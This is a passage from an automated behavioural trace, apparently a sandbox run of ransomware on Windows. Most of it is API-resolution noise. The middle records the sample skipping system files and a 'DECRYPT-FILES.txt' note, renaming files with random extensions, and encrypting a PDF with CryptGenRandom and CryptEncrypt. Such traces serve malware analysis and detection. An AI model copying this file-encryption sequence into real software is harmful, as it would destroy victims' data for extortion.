lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.222] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.223] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.223] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.223] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.223] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.223] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.223] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.223] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.223] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.223] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.223] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.223] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.223] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.223] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.223] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.223] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.223] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.223] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.223] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.223] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.224] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.224] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.224] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.224] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.224] lstrlenA (lpString="DELETEATOM") returned 10 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.224] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.224] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.224] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.224] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.224] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.224] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.224] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.224] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.224] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.224] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.224] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.224] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.224] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.224] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.224] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.225] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.225] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.225] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.225] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.225] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.225] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.225] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.225] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.225] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.225] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.225] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.225] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.225] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.225] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.225] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.225] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.225] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.225] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.225] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.226] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.226] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.226] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.226] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.226] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.226] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.226] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.226] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.226] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.226] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.226] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.226] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.226] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.226] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.226] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.226] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.226] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jO2V.bmp") returned 54 [0077.226] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jO2V.bmp.44cBj") returned 60 [0077.226] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jO2V.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jo2v.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jO2V.bmp.44cBj" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jo2v.bmp.44cbj"), dwFlags=0x0) returned 1 [0077.227] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.227] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.227] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.228] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdc8f2780, ftCreationTime.dwHighDateTime=0x1d4ca0a, ftLastAccessTime.dwLowDateTime=0xbe3c20d0, ftLastAccessTime.dwHighDateTime=0x1d4c8e3, ftLastWriteTime.dwLowDateTime=0xbe3c20d0, ftLastWriteTime.dwHighDateTime=0x1d4c8e3, nFileSizeHigh=0x0, nFileSizeLow=0x1148, dwReserved0=0x0, dwReserved1=0x0, cFileName="khORsonbXGYfkGp.pdf", cAlternateFileName="KHORSO~1.PDF")) returned 1 [0077.228] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf", lpString2="DECRYPT-FILES.txt") returned 1 [0077.228] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf", lpString2="autorun.inf") returned 1 [0077.228] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf", lpString2="boot.ini") returned 1 [0077.228] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf", lpString2="desktop.ini") returned 1 [0077.228] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf", lpString2="ntuser.dat") returned -1 [0077.228] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf", lpString2="iconcache.db") returned 1 [0077.228] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf", lpString2="bootsect.bak") returned 1 [0077.228] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf", lpString2="ntuser.dat.log") returned -1 [0077.228] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf", lpString2="thumbs.db") returned -1 [0077.228] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf", lpString2="Bootfont.bin") returned 1 [0077.228] lstrlenW (lpString="khORsonbXGYfkGp.pdf") returned 19 [0077.228] lstrcmpiW (lpString1="pdf", lpString2="lnk") returned 1 [0077.228] lstrcmpiW (lpString1="pdf", lpString2="exe") returned 1 [0077.228] lstrcmpiW (lpString1="pdf", lpString2="sys") returned -1 [0077.228] lstrcmpiW (lpString1="pdf", lpString2="dll") returned 1 [0077.228] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0077.228] lstrlenW (lpString="khORsonbXGYfkGp.pdf") returned 19 [0077.228] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0077.228] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="khORsonbXGYfkGp.pdf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\khORsonbXGYfkGp.pdf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\khORsonbXGYfkGp.pdf" [0077.228] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.228] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\khORsonbXGYfkGp.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\khorsonbxgyfkgp.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0077.229] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=4424) returned 1 [0077.229] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0077.229] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0077.229] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.229] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.229] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.229] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0077.229] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0077.230] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.230] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0077.230] CloseHandle (hObject=0x444) returned 1 [0077.231] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.231] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0077.231] CloseHandle (hObject=0x0) returned 0 [0077.231] CloseHandle (hObject=0x440) returned 1 [0077.232] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.233] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.233] GetTickCount () returned 0x114bd18 [0077.233] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.233] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.233] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.233] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.234] lstrlenA (lpString="kernel32.dll") returned 12 [0077.234] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.234] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.234] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.234] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.234] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.234] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.234] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.234] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.234] lstrlenA (lpString="ADDATOMA") returned 8 [0077.234] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.234] lstrlenA (lpString="ADDATOMW") returned 8 [0077.234] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.234] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.234] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.234] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.234] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.234] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.234] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.234] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.234] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.234] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.234] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.234] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.234] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.234] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.234] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.235] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.235] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.235] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.235] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.235] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.235] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.235] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.235] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.235] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.235] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.235] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.235] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.235] 